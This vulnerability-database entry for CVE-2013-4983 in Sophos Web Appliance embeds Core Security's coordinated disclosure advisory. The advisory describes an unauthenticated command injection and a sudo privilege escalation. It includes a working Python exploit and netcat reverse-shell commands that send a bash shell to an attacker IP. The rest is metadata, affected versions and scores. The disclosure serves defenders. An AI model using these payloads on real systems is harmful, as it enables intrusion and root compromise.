ID

VAR-201309-0289


CVE

CVE-2013-4983


TITLE

Sophos Web Appliance of /opt/ws/bin/sblistpack of get_referers Arbitrary command execution vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2013-004013

DESCRIPTION

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to end-user/index.php. Sophos Web Appliance is prone to a remote command-injection vulnerability. Attackers can exploit this issue to execute arbitrary commands with the privileges of the 'spiderman' operating system user. Versions prior to Web Appliance 3.7.9.1 and 3.8.1.1 are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. *Advisory Information* Title: Sophos Web Protection Appliance Multiple Vulnerabilities Advisory ID: CORE-2013-0809 Advisory URL: http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities Date published: 2013-09-06 Date of last update: 2013-09-06 Vendors contacted: Sophos Release mode: Coordinated release 2. *Vulnerability Information* Class: OS command injection [CWE-78], OS command injection [CWE-78] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-4983, CVE-2013-4984 3. *Vulnerability Description* Sophos Web Protection Appliance [1] provides advanced web malware protection, URL filtering and content control (including scanning of HTTPS traffic) in a Secure Web Gateway appliance. 4. *Vulnerable Packages* . Other versions may be affected too but they were no checked. 5. *Non-Vulnerable Packages* . 6. *Vendor Information, Solutions and Workarounds* Sophos published release notes and a knowledgebase article acknowledging the issue and the assistance given by Core Security in tracking it down [2][3]. 7. *Credits* This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* 8.1. *Pre-authentication OS command injection vulnerability* [CVE-2013-4983] The file '/opt/ui/apache/htdocs/end-user/index.php' can be accessed by unauthenticated users at 'https://<WPA_server>/end-user/index.php'. It also can be reached through plain HTTP at 'http://<WPA_server>/index.php', since Apache's 'httpd.conf' configuration file defines a VirtualHost at port 80 having DocumentRoot '/opt/ui/apache/htdocs/end-user/'. The 'run()' function in this PHP script obtains the requested controller from its 'c' GET parameter and calls the appropriate handler. Available handlers are defined in '/opt/ui/apache/htdocs/config/UsrSiteflow.php': /----- <?php require_once('AbstractSiteFlow.php'); class UsrSiteflow extends AbstractSiteFlow { public function __construct() { $this->flow = array( "index" => "UsrBlocked.php", "blocked" => "UsrBlocked.php", "invalid_certificate" => "UsrBlocked.php", "rss" => "UsrRss.php", ); } } ?> -----/ That means that, for example, when requesting 'https://<WPA_server>/end-user/index.php?c=blocked', the 'UsrBlocked.php' script will be used to render the page. Looking at the code in '/opt/ui/apache/htdocs/controllers/UsrBlocked.php': /----- <?php [...] if(isset($_GET['action'])) { if($_GET['action'] == 'continue') { // use sblistpack to allow access $url = base64_decode($_POST['url']); $scheme = parse_url($url,PHP_URL_SCHEME); if($scheme == "https" && $this->config->read('wsa_proxy.https_scan') != 'yes') { $host = parse_url($url,PHP_URL_HOST); $args['url'] = $scheme . '://' . $host; } else { $args['url'] = $url; } if($_POST['args_reason'] == 'filetypewarn') { $key = $_POST['url']; $packer = '/opt/ws/bin/ftsblistpack'; $value = $_POST['filetype']; } else { $key = $_POST['domain']; $packer = '/opt/ws/bin/sblistpack'; $catParts = explode("|",$_POST['raw_category_id']); $value = $catParts[0]; } if(strlen(trim($_POST['user'])) > 0) $user = base64_decode($_POST['user_encoded']); else $user = $_POST['client-ip']; if($user == '-') $user = $_POST['client-ip']; $key = escapeshellarg($key); $user = escapeshellarg($user); $value = escapeshellarg($value); shell_exec("$packer $key $user $value"); [...] ?> -----/ we can see that the Perl script '/opt/ws/bin/sblistpack' will be executed when the following conditions are met: 1. the 'action' GET parameter is set to 'continue', and 2. the 'args_reason' POST parameter is set to anything different that 'filetypewarn'; Variables whose content is controlled by the user '($key, $user, $value)' are properly escaped by using 'escapeshellarg()' before calling 'shell_exec()', making the UsrBlocked.php script not vulnerable to OS command injection at that point. However, the invoked '/opt/ws/bin/sblistpack' Perl script itself is vulnerable to OS command injection, because its 'get_referers()' function doesn't escape the first argument of the script before using it within a string that will be executed as a command by using backticks: /----- sub get_referers { my $domain = shift; if(! -f $referer_list) { return (); } # handle multiple google domains (e.g. google.co.uk) if($domain =~ /^google\./) { $domain = 'google.com'; } my $output = `/opt/ws/bin/kvlistquery $referer_list $domain`; chomp $output; if($output =~ /'(.*)'$/) { my $sites = $1; return split('\|', $sites); } return (); } -----/ so, by setting the 'domain' POST parameter to a value like: /----- http://example.com;/bin/nc -c /bin/bash 192.168.1.100 4444 -----/ an unauthenticated remote attacker can execute arbitrary OS commands on the Sophos appliance with the privileges of the 'spiderman' operating system user. 8.1.1. *Proof of Concept* The following Python script exploits the pre-authentication OS command injection vulnerability and executes '/bin/nc -c /bin/bash 192.168.1.100 4444' on a vulnerable Sophos Web Protection Appliance in order to gain a reverse shell on attacker's machine at 192.168.1.100: /----- import sys import httplib def main(): if len(sys.argv) < 2: print "Usage: sophos_wpa_command_injection.py <target_ip>" sys.exit(1) host = sys.argv[1] port = 443 headers = {'Host': host, 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Type': 'application/x-www-form-urlencoded' } body = 'url=aHR0cDovL3d3dy5leGFtcGxlLmNvbQ%3d%3d' body += '&args_reason=something_different_than_filetypewarn&filetype=dummy&user=buffalo' body += '&user_encoded=YnVmZmFsbw%3d%3d&domain=http%3a%2f%2fexample.com%3b%2fbin%2fnc%20-c%20%2fbin%2fbash%20192.168.1.100%204444' body += '&raw_category_id=one%7ctwo%7cthree%7cfour' conn = httplib.HTTPSConnection(host, port) conn.request('POST', '/end-user/index.php?c=blocked&action=continue', body=body, headers=headers) #Don't wait for the server response since it will be blocked by the spawned shell conn.close() print 'Done.' if __name__ == '__main__': main() -----/ 8.2. *Privilege escalation through local OS command injection vulnerability* [CVE-2013-4984] The Apache web server within the Sophos appliance runs under the 'spiderman' user. The '/etc/sudoers' file defines a list of Bash and Perl scripts that the 'spiderman' user can run with the 'sudo' command: /----- spiderman ALL=NOPASSWD:/opt/sophox/bin/configure_interface, \ /opt/sophox/bin/sophox-register, \ /opt/sophox/bin/sophox-remote-assist, \ [...] /opt/cma/bin/clear_keys.pl, \ [...] -----/ The Perl script '/opt/cma/bin/clear_keys.pl' is vulnerable to OS command injection, because its 'close_connections()' function: /----- sub close_connections { my ($client_ip, $signum, $signame) = @_; my @connections = `/bin/netstat -nap|grep ^tcp.*:22.*$client_ip.*EST`; foreach (@connections) { if(/ESTABLISHED\s*(\d+)\/sshd/) { my $conn_pid = $+; log_info("connection PID: $conn_pid; my PID: $$; my process tree: " . join(', ', @my_process_tree)); next if (grep {$_ == $conn_pid} @my_process_tree); log_info("Attempting to stop process '$conn_pid' with $signame"); kill $signum, $conn_pid; } } } -----/ doesn't escape the second argument of the script before using it within a string that will be executed as a command by using backticks. The following command can be executed within a compromised Web Protection Appliance to escalate privileges from 'spiderman' user to root and gain a reverse root shell on attacker's machine at 192.168.1.100: /----- $ sudo /opt/cma/bin/clear_keys.pl fakeclientfqdn ";/bin/nc -c /bin/bash 192.168.1.100 5555;" /fakedir -----/ 9. *Report Timeline* . 2013-08-12: Core Security Technologies notifies the Sophos team of the vulnerability and sends a technical report. Publication date is set for Sep 4th, 2013. 2013-08-13: Vendor acknowledges Core Security Technologies's e-mail, confirms the issues and notifies that they are working on a resolution and a release plan. 2013-08-14: Vendor notifies that they are expecting to release a fixed version in the first week of September. Vendor also notifies that they are also in the middle of an extended rollout of a new version of the product and would like to make this fix available to customers on both the new and old versions of the product, which increases the amount of testing involved. Sophos team asks for delay the advisory publication one week (Sep 11th). 2013-08-20: Core re-schedules the advisory publication for Sep 11th, 2013. 2013-09-05: Vendor notifies that they completed the testing early and the fixed version of the Web Appliance is scheduled for tomorrow, Friday 6th. Vendor also notifies that they have published release notes and a knowledgebase article acknowledging the issues [2][3]. 2013-09-06: Advisory CORE-2013-0809 published. 10. *References* [1] http://www.sophos.com/medialibrary/PDFs/factsheets/sophoswebappliancesdsna.pdf. [2] http://www.sophos.com/en-us/support/knowledgebase/119773.aspx. [3] http://ca-repo1.sophos.com/docs/ws1000/ws1000/concepts/ReleaseNotes_3.8.1.1.html. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Trust: 2.07

sources: NVD: CVE-2013-4983 // JVNDB: JVNDB-2013-004013 // BID: 62263 // VULHUB: VHN-64985 // PACKETSTORM: 123131

AFFECTED PRODUCTS

vendor:sophosmodel:web appliancescope:eqversion:3.3.3

Trust: 1.6

vendor:sophosmodel:web appliancescope:eqversion:3.0.1

Trust: 1.6

vendor:sophosmodel:web appliancescope:eqversion:3.3.1

Trust: 1.6

vendor:sophosmodel:web appliancescope:eqversion:3.2.2.1

Trust: 1.6

vendor:sophosmodel:web appliancescope:eqversion:3.0.1.1

Trust: 1.6

vendor:sophosmodel:web appliancescope:eqversion:3.0.4

Trust: 1.6

vendor:sophosmodel:web appliancescope:eqversion:3.0.3

Trust: 1.6

vendor:sophosmodel:web appliancescope:eqversion:3.0.0

Trust: 1.6

vendor:sophosmodel:web appliancescope:eqversion:3.3.2

Trust: 1.6

vendor:sophosmodel:web appliancescope:eqversion:3.0.2

Trust: 1.6

vendor:sophosmodel:web appliancescope:eqversion:3.6.1.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.6.2.3

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.1.4

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.5.4

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.6.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.5.5

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.2.4

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.7.5

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.6.4

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.2.3

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.7.4

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.4.6

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.7.2

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.0.5.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.4.5

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.1.2

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.4.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.7.8.2

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.6.2.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.4.4

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.6.4.2

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.1.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.4.2

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.7.3

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.2.7

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.3.6.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.3.5

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.5.3

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.4.7

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.5.6

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.6.4.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.8.0

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.1.3

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.0.5

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.5.1.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.5.2

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.8.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.6.3

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.1.0.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.7.8

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.2.6

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.7.6

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.7.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.2.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.3.0

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.2.5

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.1.0

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.4.3

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.4.3.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.4.8

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.5.0

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.3.3.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:lteversion:3.7.9

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.3.4

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.5.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.6.2.4.0

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.6.2.4.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.6.2

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.5.1.2

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.7.7

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.7.0

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.7.8.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.3.5.1

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.3.6

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.4.0

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.2.2

Trust: 1.0

vendor:sophosmodel:web appliancescope:eqversion:3.8.1.1

Trust: 0.8

vendor:sophosmodel:web appliancescope: - version: -

Trust: 0.8

vendor:sophosmodel:web appliancescope:ltversion:3.8

Trust: 0.8

sources: JVNDB: JVNDB-2013-004013 // CNNVD: CNNVD-201309-071 // NVD: CVE-2013-4983

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-4983
value: HIGH

Trust: 1.0

NVD: CVE-2013-4983
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201309-071
value: CRITICAL

Trust: 0.6

VULHUB: VHN-64985
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2013-4983
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-64985
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-64985 // JVNDB: JVNDB-2013-004013 // CNNVD: CNNVD-201309-071 // NVD: CVE-2013-4983

PROBLEMTYPE DATA

problemtype:CWE-78

Trust: 1.9

sources: VULHUB: VHN-64985 // JVNDB: JVNDB-2013-004013 // NVD: CVE-2013-4983

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201309-071

TYPE

operating system commend injection

Trust: 0.6

sources: CNNVD: CNNVD-201309-071

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-004013

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-64985

PATCH

title:119773url:http://www.sophos.com/en-us/support/knowledgebase/119773.aspx

Trust: 0.8

sources: JVNDB: JVNDB-2013-004013

EXTERNAL IDS

db:NVDid:CVE-2013-4983

Trust: 2.9

db:BIDid:62263

Trust: 1.0

db:JVNDBid:JVNDB-2013-004013

Trust: 0.8

db:CNNVDid:CNNVD-201309-071

Trust: 0.7

db:PACKETSTORMid:123131

Trust: 0.2

db:SEEBUGid:SSVID-81753

Trust: 0.1

db:SEEBUGid:SSVID-81905

Trust: 0.1

db:EXPLOIT-DBid:28175

Trust: 0.1

db:EXPLOIT-DBid:28334

Trust: 0.1

db:PACKETSTORMid:123259

Trust: 0.1

db:VULHUBid:VHN-64985

Trust: 0.1

sources: VULHUB: VHN-64985 // BID: 62263 // JVNDB: JVNDB-2013-004013 // PACKETSTORM: 123131 // CNNVD: CNNVD-201309-071 // NVD: CVE-2013-4983

REFERENCES

url:http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities

Trust: 1.8

url:http://www.sophos.com/en-us/support/knowledgebase/119773.aspx

Trust: 1.7

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4983

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-4983

Trust: 0.8

url:http://www.securityfocus.com/bid/62263

Trust: 0.6

url:https://<wpa_server>/end-user/index.php?c=blocked',

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-4983

Trust: 0.1

url:http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Trust: 0.1

url:http://www.sophos.com/en-us/support/knowledgebase/119773.aspx.

Trust: 0.1

url:http://corelabs.coresecurity.com/

Trust: 0.1

url:http://example.com;/bin/nc

Trust: 0.1

url:http://www.coresecurity.com.

Trust: 0.1

url:http://www.sophos.com/medialibrary/pdfs/factsheets/sophoswebappliancesdsna.pdf.

Trust: 0.1

url:https://<wpa_server>/end-user/index.php'.

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-4984

Trust: 0.1

url:http://creativecommons.org/licenses/by-nc-sa/3.0/us/

Trust: 0.1

url:http://corelabs.coresecurity.com.

Trust: 0.1

url:http://ca-repo1.sophos.com/docs/ws1000/ws1000/concepts/releasenotes_3.8.1.1.html.

Trust: 0.1

url:http://<wpa_server>/index.php',

Trust: 0.1

sources: VULHUB: VHN-64985 // JVNDB: JVNDB-2013-004013 // PACKETSTORM: 123131 // CNNVD: CNNVD-201309-071 // NVD: CVE-2013-4983

CREDITS

Francisco Falcon from Core Exploit Writers Team

Trust: 0.9

sources: BID: 62263 // CNNVD: CNNVD-201309-071

SOURCES

db:VULHUBid:VHN-64985
db:BIDid:62263
db:JVNDBid:JVNDB-2013-004013
db:PACKETSTORMid:123131
db:CNNVDid:CNNVD-201309-071
db:NVDid:CVE-2013-4983

LAST UPDATE DATE

2025-04-11T22:53:11.941000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-64985date:2013-10-09T00:00:00
db:BIDid:62263date:2013-09-18T00:11:00
db:JVNDBid:JVNDB-2013-004013date:2014-03-20T00:00:00
db:CNNVDid:CNNVD-201309-071date:2013-09-11T00:00:00
db:NVDid:CVE-2013-4983date:2025-04-11T00:51:21.963

SOURCES RELEASE DATE

db:VULHUBid:VHN-64985date:2013-09-10T00:00:00
db:BIDid:62263date:2013-09-06T00:00:00
db:JVNDBid:JVNDB-2013-004013date:2013-09-11T00:00:00
db:PACKETSTORMid:123131date:2013-09-07T02:51:42
db:CNNVDid:CNNVD-201309-071date:2013-09-10T00:00:00
db:NVDid:CVE-2013-4983date:2013-09-10T11:28:40.997